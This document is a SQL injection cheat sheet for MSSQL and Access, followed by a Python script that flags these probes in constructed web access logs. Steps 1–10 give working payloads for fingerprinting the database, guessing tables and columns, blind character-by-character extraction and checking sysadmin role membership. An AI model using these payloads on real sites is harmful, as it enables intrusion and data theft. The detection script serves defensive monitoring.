1. Test whether injection is possible: ;and 1=1 ;and 1=2

2. Initial check for whether the backend is MSSQL: ;and user>0

3. When the injected parameter is a string: 'and [query condition] and ''='

4. When a search parameter is not filtered: 'and [query condition] and '%25'='
5. Determine the database system

;and (select count(*) from sysobjects)>0   (MSSQL)

;and (select count(*) from msysobjects)>0   (Access)
6. Guess the database name: ;and (select Count(*) from [database name])>0

7. Guess the column name: ;and (select Count(column name) from database name)>0

8. Guess the length of a record in the column: ;and (select top 1 len(column name) from database name)>0

9. (1) Guess the ASCII value of the column content (Access)

;and (select top 1 asc(mid(column name,1,1)) from database name)>0

(2) Guess the ASCII value of the column content (MSSQL)

;and (select top 1 unicode(substring(column name,1,1)) from database name)>0
10. Test the permission structure (MSSQL)

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--
11. Add MSSQL and system accounts
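The probes above leave a recognizable trail in web server logs: a true/false pair, a user>0 check, a sysobjects or msysobjects lookup, role-membership calls, and top 1 len()/asc()/unicode() extraction, usually from one client in sequence. The added example below (written for this page, not code from the original author) URL-decodes the query-string parameters of constructed Apache-style access-log lines, matches each value against one pattern per probe family from steps 1 to 10, and flags clients that trigger more than one family. The log lines, rule names and thresholds are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not real traffic); the query strings carry
# the probe forms listed in the cheat sheet, plus a benign search on the last line.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
203.0.113.10 - - [10/Oct/2023:13:55:41 +0000] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 5120
203.0.113.10 - - [10/Oct/2023:13:55:42 +0000] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 318
203.0.113.10 - - [10/Oct/2023:13:56:02 +0000] "GET /news.asp?id=12%20and%20user>0 HTTP/1.1" 500 1203
203.0.113.10 - - [10/Oct/2023:13:56:30 +0000] "GET /news.asp?id=12;and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 5120
203.0.113.10 - - [10/Oct/2023:13:57:10 +0000] "GET /news.asp?id=12;and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));-- HTTP/1.1" 200 5120
203.0.113.11 - - [10/Oct/2023:14:01:00 +0000] "GET /search.asp?q=budget%20and%20planning HTTP/1.1" 200 2210
"""

# One rule per probe family from steps 1 to 10; patterns run over a decoded,
# lower-cased, whitespace-collapsed parameter value.
RULES = [
    ("boolean_probe", re.compile(r"\band\s+1\s*=\s*[12]\b")),                 # step 1
    ("mssql_user_probe", re.compile(r"\band\s+user\s*>\s*0\b")),               # step 2
    ("schema_table_probe", re.compile(r"\bfrom\s+m?sysobjects\b")),            # step 5
    ("role_probe", re.compile(r"\bis_(?:srvrolemember|member)\s*\(")),         # step 10
    ("char_extraction", re.compile(r"\bselect\s+top\s+1\s+(?:len|asc|unicode)\s*\(")),  # steps 8-9
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def normalize(value, max_rounds=3):
    """URL-decode until stable (catches the %25-style double encoding of step 4),
    then fold case and collapse whitespace so the patterns stay simple."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return " ".join(value.lower().split())


def query_params(target):
    """Yield (name, normalized value) pairs. The query is split on '&' only:
    ';' is deliberately not a separator, because the probes use it inside a value."""
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        yield name, normalize(raw)


def detect(log_text):
    """Return (line_no, client, parameter, rule) for every parameter value matching a rule."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for name, value in query_params(match.group(1)):
            for rule, pattern in RULES:
                if pattern.search(value):
                    findings.append((line_no, client, name, rule))
    return findings


def probing_clients(findings, min_rules=2):
    """Clients that hit at least min_rules distinct probe families. A lone 'and 1=1'
    can be noise; several families from one client look like the enumeration above."""
    by_client = {}
    for _, client, _, rule in findings:
        by_client.setdefault(client, set()).add(rule)
    return {client for client, rules in by_client.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("clients probing across families:", probing_clients(hits))
```

On the constructed log the benign search on the last line is not flagged, while 203.0.113.10 triggers four different families within two minutes, which is the signal worth alerting on rather than any single pattern.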